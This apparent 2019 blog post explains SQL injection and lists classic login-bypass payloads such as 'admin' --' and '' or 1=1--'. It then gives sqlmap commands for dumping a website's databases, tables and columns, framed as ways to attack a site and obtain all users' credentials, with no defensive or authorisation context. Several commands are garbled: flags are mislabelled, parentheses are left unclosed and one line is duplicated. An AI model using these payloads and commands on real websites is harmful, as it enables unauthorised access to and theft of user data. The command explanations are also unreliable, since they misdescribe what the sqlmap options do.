What is SQL Injection & How to use SQL Map
By siddhant
on
June 05, 2019
SQL Injection is a type of an attack which is done on the websites to excess their sensitive data without any authority by adding any malicious content into the website called payload. By the SQL injection vulnerability, an attacker can bypass the login credential by putting some SQL cheat codes in it and can access all the data of the websites and the credentials of all the user of the website.
SQL Injection can also be used to add, modify and delete records in a database, affecting data integrity.

It can be done in two ways:
1. By using SQL cheat codes
• admin' --
• admin' #
• admin'/*
• ' or 1=1--
• ' or 1=1#
• ' or 1=1/*
• ') or '1'='1--
• ') or ('1'='1--
SQL map is the tool in Kali Linux from which we can attack the website by using some commands like:
• sqlmap -u (link of the website on which you want to attack) --DBS
By this command you will enter in the database of the website
• sqlmap -u (link of the website on which you want to attack) -D (table name) --tables
This command will help you to enter in a specific table.
• sqlmap -u (link of the website on which you want to attack) -D (table name) -T (column name) --columns
This command will help you to enter in the specific column of the specific table.
• sqlmap -u (link of the website on which you want to attack) -D (table name) -T (column name-C (specific column) --dump
• sqlmap -u (link of the website on which you want to attack) -D (table name) -T (column name-C (specific column) --dump
By this command you will get into the database of the website.
No comments